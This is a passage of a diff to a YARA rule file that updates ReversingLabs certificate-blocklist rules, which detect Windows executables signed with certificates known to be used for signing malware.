+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OORT inc." and ( pe.signatures [ i ] . serial == "00:56:9e:03:98:8a:f6:0d:80:ce:60:72:89:40:85:0d:9b" or pe.signatures [ i ] . serial == "56:9e:03:98:8a:f6:0d:80:ce:60:72:89:40:85:0d:9b" ) and 1601006510 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6E2D3449272B6B96B8B9F728E87580D5 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_418F6D959A8A0F82Bef07Ceba3603E52 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "6975acb9-3b37-51f5-8b4d-0d1a090a18e2"
+		id = "ecfb72ef-04c4-55b6-b9e0-e95053e03425"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L12930-L12946"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "0155a8c71bf8426bbb980798772b04c145df5b8c4b60ff1a610a1236a47547ef"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L5844-L5862"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "6c13c5e85d6e053319193d1d94f216eeec64405c86d15971419078a1ce6c8ac9"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16687,21 +41352,21 @@ rule REVERSINGLABS_Cert_Blocklist_6E2D3449272B6B96B8B9F728E87580D5 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RADIANT, OOO" and pe.signatures [ i ] . serial == "6e:2d:34:49:27:2b:6b:96:b8:b9:f7:28:e8:75:80:d5" and 1421107200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OORT inc." and ( pe.signatures [ i ] . serial == "00:41:8f:6d:95:9a:8a:0f:82:be:f0:7c:eb:a3:60:3e:52" or pe.signatures [ i ] . serial == "41:8f:6d:95:9a:8a:0f:82:be:f0:7c:eb:a3:60:3e:52" ) and 1601928240 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_268C0D7028A154Ac3B6349C5 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_5378C5Bbeba0D3309A35Bb47F63037F7 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "0e18d9ef-e861-5583-a2a3-5f54fae8d813"
+		id = "7f367505-d7c1-5b8c-83bd-df3fec789d12"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L12948-L12964"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "8311b36f008e31b7ac27b439fa46da4c90ab4be6c7c89426f8e1939963bc3d7d"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L5864-L5882"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "a96acf93ca6da4d3bf5177b51996825cd3ea70443577622deccdd11fde579c31"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16711,21 +41376,21 @@ rule REVERSINGLABS_Cert_Blocklist_268C0D7028A154Ac3B6349C5 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "26:8c:0d:70:28:a1:54:ac:3b:63:49:c5" and 1474266712 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OORT inc." and ( pe.signatures [ i ] . serial == "00:53:78:c5:bb:eb:a0:d3:30:9a:35:bb:47:f6:30:37:f7" or pe.signatures [ i ] . serial == "53:78:c5:bb:eb:a0:d3:30:9a:35:bb:47:f6:30:37:f7" ) and 1601427420 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_2Daa8D629Cc0410A9482E62A0F8Bf8Fc : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0Bab6A2Aa84B495D9E554A4C42C0126D : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "71e627d9-0892-5501-8189-26eae36b7965"
+		id = "7b6d364c-3e27-5314-b604-d44bb408fc4e"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L12966-L12982"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "cfb2631bc1832f65fb9d77c812bf2a1e05121e825254bd57ae8b21e7b10b2344"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L5884-L5900"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "79b6df421c78fd3e2f05a60f7d875e02519297a0278614c9f63dff8b1b2a2d18"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16735,21 +41400,21 @@ rule REVERSINGLABS_Cert_Blocklist_2Daa8D629Cc0410A9482E62A0F8Bf8Fc : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DON'T MISS A WORD LIMITED" and pe.signatures [ i ] . serial == "2d:aa:8d:62:9c:c0:41:0a:94:82:e6:2a:0f:8b:f8:fc" and 1543449600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NOSOV SP Z O O" and pe.signatures [ i ] . serial == "0b:ab:6a:2a:a8:4b:49:5d:9e:55:4a:4c:42:c0:12:6d" and 1597971600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_9A727E200Ea76570 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_6314001C3235Cd59Bcc3F5278C518804 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "d133dac3-3959-50f0-913e-b279ca6a1c2c"
+		id = "aff0fb76-587b-5493-810c-ac32a6ba9576"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L12984-L13002"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "337dc486f2bdca1f7682887d5e5c0f82961850a8fd9c9a20b9a43a75334070d8"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L5902-L5918"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "4320f3884c0f7e4939e8988a4e83b8028a5e01fb425ae4faa2273134db835813"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16759,21 +41424,21 @@ rule REVERSINGLABS_Cert_Blocklist_9A727E200Ea76570 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Alexsandro Da Rosa - ME" and ( pe.signatures [ i ] . serial == "00:9a:72:7e:20:0e:a7:65:70" or pe.signatures [ i ] . serial == "9a:72:7e:20:0e:a7:65:70" ) and 1539056530 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GIE-MUTUALISTE" and pe.signatures [ i ] . serial == "63:14:00:1c:32:35:cd:59:bc:c3:f5:27:8c:51:88:04" and 1600304400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0954A3C876Df9262Cde5817F9870F0C6 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0Ed8Ade5D73B73Dade6943D557Ff87E5 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "89f3a334-cd2f-51b9-83b2-2baca3c59ba5"
+		id = "dbfae40c-2f81-5daf-8655-d06ae38ffa8f"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L13004-L13020"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "164b064a9df31d4a122236dfee7b713417a44d47a7f304b2bf55686a7f038feb"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L5920-L5936"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "7796b6e7da900be8634e7f1e51cda1275ab1e7c2709af7ecaa8777ab0b518494"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16783,21 +41448,21 @@ rule REVERSINGLABS_Cert_Blocklist_0954A3C876Df9262Cde5817F9870F0C6 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Dialer Access" and pe.signatures [ i ] . serial == "09:54:a3:c8:76:df:92:62:cd:e5:81:7f:98:70:f0:c6" and 1160438400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rumikon LLC" and pe.signatures [ i ] . serial == "0e:d8:ad:e5:d7:3b:73:da:de:69:43:d5:57:ff:87:e5" and 1597885200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_3C30930E53Bb026F9A5D7440155F7118 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0292C7D574132Ba5C0441D1C7Ffcb805 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "ad7d8be0-ecb1-508f-bfce-7a5cecfd4e2f"
+		id = "ef58cf01-9c54-5dbb-99a7-d3ca42663133"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L13022-L13038"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "260a58669043d21ee0ffccbdee95c9d04ef338497685d42f1951660f658a164d"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L5938-L5954"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "d2bcf72f4c5829d161bc40e820eb0b1a85deaa49b749422d5429e27b7fb2b1fe"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16807,21 +41472,21 @@ rule REVERSINGLABS_Cert_Blocklist_3C30930E53Bb026F9A5D7440155F7118 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CPM Media, Ltd." and pe.signatures [ i ] . serial == "3c:30:93:0e:53:bb:02:6f:9a:5d:74:40:15:5f:71:18" and 1064534400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TES LOGISTIKA d.o.o." and pe.signatures [ i ] . serial == "02:92:c7:d5:74:13:2b:a5:c0:44:1d:1c:7f:fc:b8:05" and 1602183720 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_432Eefc0D4Dc0326Eb277A518Cc4310A : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_1F23F001458716D435Cca1A55D660Ec5 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "eeccb477-0bf7-5b79-94df-710e6e0db78f"
+		id = "16614e20-1cf1-55c0-a04c-d99c06fb29a2"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L13040-L13056"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "d5a0b7f19f66f18b5ef1c548276b675ead74fed6be94310c303bfad6c85f18be"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L5956-L5972"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "bacfb4b7900ab57d23474e0422bd74fff113296b8db37e8eae3bd456443d28d6"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16831,21 +41496,21 @@ rule REVERSINGLABS_Cert_Blocklist_432Eefc0D4Dc0326Eb277A518Cc4310A : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Beijing Caiyunshidai Technology Co., Ltd." and pe.signatures [ i ] . serial == "43:2e:ef:c0:d4:dc:03:26:eb:27:7a:51:8c:c4:31:0a" and 1466121600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Ringen" and pe.signatures [ i ] . serial == "1f:23:f0:01:45:87:16:d4:35:cc:a1:a5:5d:66:0e:c5" and 1603176940 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_470D6Ce21A6940320261F09E : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_6E0Ccbdfb4777E10Ea6221B90Dc350C2 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "00b92b5d-59e3-5aae-954d-a90bd8cc1370"
+		id = "64007bd7-b273-5579-8224-68337f1bc54d"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L13058-L13074"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "cae1d381bf2018a0ce56feb245d01f2bfea55b67894264d32d78dbb41873c792"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L5974-L5990"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "08a1ff7cc3a7680fdbb3235a7b46709cd4ba530a9afeab4344671db9fe893cc4"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16855,21 +41520,21 @@ rule REVERSINGLABS_Cert_Blocklist_470D6Ce21A6940320261F09E : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "47:0d:6c:e2:1a:69:40:32:02:61:f0:9e" and 1474523038 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TRAUMALAB INTERNATIONAL APS" and pe.signatures [ i ] . serial == "6e:0c:cb:df:b4:77:7e:10:ea:62:21:b9:0d:c3:50:c2" and 1603046620 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_7E6Bc7E5A49E2C28E6F5D042 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0Ed1847A2Ae5D71Def1E833Fddd33D38 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "a7b815d9-e247-5de1-9bcb-96294b3b91c0"
+		id = "11fd3bbe-5d15-57b7-a461-fc9c90046dbc"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L13076-L13092"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "f378c490ff4f32fc095c822f75abac44a8d94327404cd97546c63e7441e07632"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L5992-L6008"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "0ec5eb8ff1f630284fabfba5c58dd563d471343ace718f79dad08cfe75c3070d"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16879,21 +41544,21 @@ rule REVERSINGLABS_Cert_Blocklist_7E6Bc7E5A49E2C28E6F5D042 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Shang Hai Jian Ji Wang Luo Ke Ji You Xian Gong Si" and pe.signatures [ i ] . serial == "7e:6b:c7:e5:a4:9e:2c:28:e6:f5:d0:42" and 1560995284 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SNAB-RESURS, OOO" and pe.signatures [ i ] . serial == "0e:d1:84:7a:2a:e5:d7:1d:ef:1e:83:3f:dd:d3:3d:38" and 1598662800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_4C5020899147C850196C4Ebf : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_97Df46Acb26B7C81A13Cc467B47688C8 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8ac60604-6548-5f11-bf89-ec7e927b20f7"
+		id = "68e2fdc7-61cd-5e0a-8bc7-5e0ca96271c5"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L13094-L13110"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "112e834a24c50d639f8607740faa609f1a36539058357544e5dbcddf841f3116"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L6010-L6028"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "6f6e0e175caee83eaec2dacedaf564b642195a8815cfd0d4564f581070b0c545"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16903,21 +41568,21 @@ rule REVERSINGLABS_Cert_Blocklist_4C5020899147C850196C4Ebf : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "4c:50:20:89:91:47:c8:50:19:6c:4e:bf" and 1476693792 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Information Civilized System Oy" and ( pe.signatures [ i ] . serial == "00:97:df:46:ac:b2:6b:7c:81:a1:3c:c4:67:b4:76:88:c8" or pe.signatures [ i ] . serial == "97:df:46:ac:b2:6b:7c:81:a1:3c:c4:67:b4:76:88:c8" ) and 1602636910 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_4Efcf7Adc21F070E590D49Ddb8081397 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_186D49Fac34Ce99775B8E7Ffbf50679D : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "df467418-9d57-5ad0-b396-2ef519a22989"
+		id = "9279d4ee-3f53-5d68-aaa1-af6ed579310f"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L13112-L13128"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "d60a5bbd50484d620ab60cfd40840abc541c2b7bc1005a9076b69ddd1b938652"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L6030-L6046"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "0444a5052ee384451ebd85918bbc6bf6d6a75334899a63a8b5828ef06cb9c7ca"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16927,21 +41592,21 @@ rule REVERSINGLABS_Cert_Blocklist_4Efcf7Adc21F070E590D49Ddb8081397 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ding Ruan" and pe.signatures [ i ] . serial == "4e:fc:f7:ad:c2:1f:07:0e:59:0d:49:dd:b8:08:13:97" and 1476921600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Hairis LLC" and pe.signatures [ i ] . serial == "18:6d:49:fa:c3:4c:e9:97:75:b8:e7:ff:bf:50:67:9d" and 1602234590 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Cbd37C0A651913Ee25A6860D7D5Ccdf2 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_B1Aea98Bf0Ce789B6C952310F14Edde0 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "e56205d6-9f02-5a8a-8dd3-b8c323fba4bf"
+		id = "f039f379-e3d5-56bd-83b7-016881538017"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L13130-L13148"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "77cc439aea6eaa5a835b6b1aa50904c1df0d5379228e424ab2d68a3cb654834c"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L6048-L6066"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "6e78750d6aca91e9e6d8f2651a5682ccdab5cd20ee3a74e1f8582eb7bc45d614"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16951,21 +41616,21 @@ rule REVERSINGLABS_Cert_Blocklist_Cbd37C0A651913Ee25A6860D7D5Ccdf2 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Amma" and ( pe.signatures [ i ] . serial == "00:cb:d3:7c:0a:65:19:13:ee:25:a6:86:0d:7d:5c:cd:f2" or pe.signatures [ i ] . serial == "cb:d3:7c:0a:65:19:13:ee:25:a6:86:0d:7d:5c:cd:f2" ) and 1431734400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Absolut LLC" and ( pe.signatures [ i ] . serial == "00:b1:ae:a9:8b:f0:ce:78:9b:6c:95:23:10:f1:4e:dd:e0" or pe.signatures [ i ] . serial == "b1:ae:a9:8b:f0:ce:78:9b:6c:95:23:10:f1:4e:dd:e0" ) and 1602612570 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_5Fe0Ad6B03C57Ab67A352159004Ca3Db : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_2Dcd0699Da08915Dde6D044Cb474157C : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "d1cf11fc-eb30-54fc-9e34-91ad0c67e694"
+		id = "e1f56719-e726-5f81-99d4-937e343cbcc9"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L13150-L13166"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "6f2489421f2effa2089b744f7e137818935fe2339d9216a42686012c51da677b"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L6068-L6084"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "e1a3f27b8b9b642fe1ca73ec54d225f4470b53d0d06f2eea55ad1ad43ec67b39"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16975,21 +41640,21 @@ rule REVERSINGLABS_Cert_Blocklist_5Fe0Ad6B03C57Ab67A352159004Ca3Db : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SpectorSoft Corp." and pe.signatures [ i ] . serial == "5f:e0:ad:6b:03:c5:7a:b6:7a:35:21:59:00:4c:a3:db" and 1402272000 <= pe.signatures [ i ] . not_after )
